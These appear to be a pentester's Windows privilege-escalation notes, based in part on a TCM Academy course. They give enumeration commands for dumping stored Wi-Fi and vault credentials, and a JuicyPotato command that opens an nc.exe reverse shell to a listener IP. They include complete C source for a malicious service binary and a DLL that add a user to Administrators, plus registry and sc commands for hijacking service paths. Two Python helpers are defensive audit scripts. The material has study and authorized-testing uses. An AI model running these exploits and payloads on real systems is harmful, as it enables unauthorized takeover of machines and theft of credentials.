Windows privilege escalation

Notes for privilege escalation on Windows. Some of these notes are based on the Windows Privilege Escalation for Beginners course by TCM Academy, which is part of the Practical Network Penetration Tester (PNPT) certification.

Other resources

Enumeration

System enumeration
Operating system

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

Patches/Hotfix

wmic qfe get Caption,Description,HotFixID,InstalledOn

Disks

wmic logicaldisk get caption,description,providername

User enumeration
Users on the machine

net user
net user <user>

Groups on the machine

net localgroup
net localgroup <group>

Network enumeration
ARP table

arp -a

Connections/open ports

netstat -ano

Password hunting
Find password string on files

findstr /si password *.txt
findstr /si password *.ini
findstr /si password *.config

List Windows Vault passwords

cmdkey /list

Wifi passwords
Find SSID

netsh wlan show profile

Show password

netsh wlan show profile <SSID> key=clear

Command history (PowerShell; history is an alias of Get-History)

history

AV enumeration
Check Windows Defender

sc query WinDefend

Check firewall (modern)

netsh advfirewall firewall dump

Check firewall (old)

netsh firewall show state

Windows subsystem for Linux

Find bash.exe binary:

\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_[...]\bash.exe

Token impersonation

Juicy potato

Find nc.exe on Kali

locate nc.exe

Reverse shell using nc.exe

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\nc.exe -e cmd.exe 10.10.14.32 443" -t *

Hidden information

Alternate data stream

List files together with their alternate data streams

dir /r

Extract the contents of a stream to a separate file

expand file:hiddenfile output

Windows Registry

Autorun
Check whether we have write permissions on the binaries listed in Autorun. If there is a file we can edit, it can be abused to escalate privileges when it is run.

Check file permissions with AccessChk

accesschk64.exe -wvu "C:\Program Files\Program"

Always install elevated
If AlwaysInstallElevated is set to 1, .msi packages are installed as SYSTEM, so a crafted .msi runs with those privileges.
Check whether the value is set to 1 in both keys.

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
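The two reg query commands above print a key line followed by the value line. As an added audit helper (not part of the original notes or the TCM course), the following Python parses that output and applies the condition the policy actually requires: the machine and the user value must both be 1 before Windows Installer runs packages elevated. The sample outputs are constructed.

```python
"""Check AlwaysInstallElevated from `reg query` output (added example, not from the notes)."""
import re

# Constructed samples of what the two `reg query` commands print.
# Values are illustrative, not taken from a real host.
SAMPLE_HKLM = r"""
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x0
"""
# What reg prints when the key does not exist at all (constructed).
SAMPLE_MISSING = "ERROR: The system was unable to find the specified registry key or value."

# reg prints DWORDs as hex (0x1); accept plain decimal too.
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
    re.IGNORECASE,
)


def always_install_elevated(reg_output):
    """Return the AlwaysInstallElevated value as an int, or None when the key or
    value is absent (reg prints an error line instead of a value line)."""
    for line in reg_output.splitlines():
        m = VALUE_RE.match(line)
        if m:
            return int(m.group(1), 0)  # base 0 parses both 0x1 and 1
    return None


def msi_runs_elevated(hklm_output, hkcu_output):
    """The policy only takes effect when BOTH the HKLM and the HKCU value are 1.
    A single hive set to 1 is a misconfiguration to report, but not yet exploitable."""
    return (always_install_elevated(hklm_output) == 1
            and always_install_elevated(hkcu_output) == 1)


if __name__ == "__main__":
    print("HKLM:", always_install_elevated(SAMPLE_HKLM))
    print("HKCU:", always_install_elevated(SAMPLE_HKCU))
    print("MSI installs run elevated:", msi_runs_elevated(SAMPLE_HKLM, SAMPLE_HKCU))
```

On a real host, feed the function the captured output of each reg query command; a None result for either hive means the policy is not configured there, which is the secure default.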

Service escalation

Unquoted service path
Look for services paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
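The findstr pipeline above filters by eye: auto-start, not under C:\Windows, no quotes. As an added example (not from the original notes or the course), the Python below does the same filtering on the output of the CSV variant of the same command, wmic service get name,displayname,pathname,startmode /format:csv, and for every flagged service lists the directories whose ACLs have to be checked, because CreateProcess tries each space-delimited prefix of an unquoted path in turn. The sample wmic output is constructed; the assumption that the executable is the first token ending in .exe is mine.

```python
"""Audit unquoted service paths from wmic CSV output (added example, not from the notes)."""
import csv

# Constructed sample of `wmic ... /format:csv` output: wmic emits a leading blank
# line, a Node column, and lists the requested columns in alphabetical order.
SAMPLE_CSV = r"""
Node,DisplayName,Name,PathName,StartMode
HOST01,Print Spooler,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST01,Vulnerable Service,VulnSvc,C:\Program Files\Vuln Corp\Service Tool\svc.exe -k net,Auto
HOST01,Quoted Service,GoodSvc,"C:\Program Files\Good Corp\svc.exe" -run,Auto
HOST01,Manual Unquoted,ManualSvc,C:\Program Files\Manual Corp\tool.exe,Manual
HOST01,No Spaces,TightSvc,C:\Tools\tight\tight.exe,Auto
"""


def parse_wmic_csv(text):
    """Return one dict per service, keyed by the header names (order-independent)."""
    lines = [line for line in text.splitlines() if line.strip()]
    # QUOTE_NONE: wmic does not quote fields, and a quoted image path such as
    # "C:\Program Files\x.exe" must reach us verbatim, not stripped of its quotes.
    return list(csv.DictReader(lines, quoting=csv.QUOTE_NONE))


def executable_from_command(cmdline):
    """Image path part of an unquoted service command line.
    Assumption: the executable is the first space-separated token ending in .exe."""
    tokens = cmdline.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1])
    return cmdline


def audit_service_path(pathname, startmode="Auto"):
    """Same filter as the findstr pipeline: auto-start, unquoted, contains a space,
    outside C:\\Windows. Returns None when the path is fine, otherwise the
    directories whose write permissions must be checked, in the order Windows
    would try the truncated prefixes (C:\\Program.exe, C:\\Program Files\\X.exe, ...)."""
    path = pathname.strip()
    if startmode.lower() != "auto" or path.startswith('"'):
        return None
    exe = executable_from_command(path)
    if " " not in exe or exe.lower().startswith("c:\\windows\\"):
        return None
    dirs = []
    for i, ch in enumerate(exe):
        if ch == " ":
            # Parent directory of the prefix that ends at this space.
            parent = exe[:i].rsplit("\\", 1)[0] + "\\"
            if parent not in dirs:
                dirs.append(parent)
    return dirs


def find_unquoted_services(wmic_csv):
    """Map service name -> directories to audit, for every service the filter flags."""
    hits = {}
    for row in parse_wmic_csv(wmic_csv):
        dirs = audit_service_path(row["PathName"], row["StartMode"])
        if dirs:
            hits[row["Name"]] = dirs
    return hits


if __name__ == "__main__":
    for name, dirs in find_unquoted_services(SAMPLE_CSV).items():
        print(name)
        for d in dirs:
            print("   check ACL on", d)
```

Each directory the function returns is one to run accesschk or icacls against; the fix on the defending side is to quote the ImagePath (sc config <service> binPath= "\"C:\path with spaces\svc.exe\"") or to remove write access for unprivileged users from those directories.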

regsvc
Check regsvc ACL

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

With Full Control over the registry key, the service's ImagePath can be pointed at a malicious executable to escalate privileges.
Malicious file that adds a user to the Administrators group:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* system() */

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);
void WINAPI ControlHandler(DWORD request);

// add the payload here
int Run()
{
    system("cmd.exe /k net localgroup administrators user /add");
    return 0;
}

int main()
{
    // Dispatch table: one entry for this service, terminated by a NULL entry
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;

    // Hands the thread to the Service Control Manager, which calls ServiceMain
    StartServiceCtrlDispatcher(ServiceTable);
    return 0;
}

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
    ServiceStatus.dwServiceType             = SERVICE_WIN32;
    ServiceStatus.dwCurrentState            = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted        = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode           = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint              = 0;
    ServiceStatus.dwWaitHint                = 0;

    hStatus = RegisterServiceCtrlHandler("MyService", ControlHandler);
    Run();   // payload runs before the service reports RUNNING

    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);

    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
        Sleep(SLEEP_TIME);
    }
    return;
}

void WINAPI ControlHandler(DWORD request)
{
    switch (request)
    {
        case SERVICE_CONTROL_STOP:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;

        case SERVICE_CONTROL_SHUTDOWN:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;

        default:
            break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
    return;
}

Compile file:

x86_64-w64-mingw32-gcc windows_service.c -o x.exe

Add file to ImagePath of regsvc:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

Start service to execute file:

sc start regsvc

File executable
If we have write privileges over an executable file that is run as administrator, we can replace the executable to escalate privileges.

Check file permissions:

C:\Users\User\accesschk64.exe -wvu "C:\Program Files\Service"

File startup
If we have write permissions over the startup programs folder, we can add a malicious file to escalate privileges.

Check folder/file permissions:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

DLL hijacking
If a .dll file of a service is not found or we have write permissions over it, we can add a malicious file to escalate privileges.

Malicious file (change the command you want to execute):

// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll

#include <windows.h>
#include <stdlib.h>   /* system() */

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved) {
    // Runs when the service process loads the DLL
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);
    }
    return TRUE;
}

After changing the file, just restart the service that loads this DLL.

binPath
If we can edit the binary path of a service, we can choose a malicious file or execute a command.

Find services with write permissions for Everyone:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc Everyone *

Check service permissions with accesschk:

C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc <service>

Change binpath to a command that adds a user to the administrators group (sc requires a space after "binpath="):

sc config <service> binpath= "net localgroup administrators <user> /add"